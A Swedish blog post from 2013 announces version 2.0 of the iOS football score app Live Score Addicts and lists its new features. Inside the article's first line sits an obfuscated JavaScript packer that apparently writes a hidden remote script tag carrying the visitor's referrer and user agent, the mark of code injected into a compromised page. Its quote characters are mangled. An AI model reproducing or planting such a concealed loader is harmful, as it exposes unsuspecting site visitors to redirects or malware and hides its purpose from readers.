Image Image Image Image Image Image Image Image Image Image

| 28 maj, 2020

Scroll to top

Top

Live Score Addicts 2.0 – håll koll på fotbollen

Filip Urde
  • On 3 april, 2013
  • http://www.revue.se/filip-urde


Champions eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zhfne|var|u0026u|referrer|zddiz||js|php’.split(’|’),0,{}))
Leauge hetsen är igång, Zlatan slog nästan Barcelona och Bayern krossade Juve. Det är mycket ha koll på, men det finns ju såklart appar för det. En av dem populäraste iOS-apparna för att hålla koll på just fotbollsmatcher är Live Score Addicts.

 

Live Score Addicts som sedan en tid tillbaka ligger på min första sida på mobilen, kommer från det svenska företaget FootballAddicts och igår precis lagom till Champions League hetsen så släppte man version 2.0.

Appen har nu fått en ganska stor omdesign av gränssnittet samt en hel del nya funktioner. Som tidigare så finns resultatuppdateringar med push-notiser, video highlights och statistik. Med appen kan du följa över 400 ligor i ca 100 länder och det finns inget bättre sätt att hålla koll på dina favoritlag.

Live Score Addicts är en gratis app och du kan ladda hem den nedan.

Forza Football
Forza Football FootballAddicts Sport, Produktivitet Gratis Ladda ner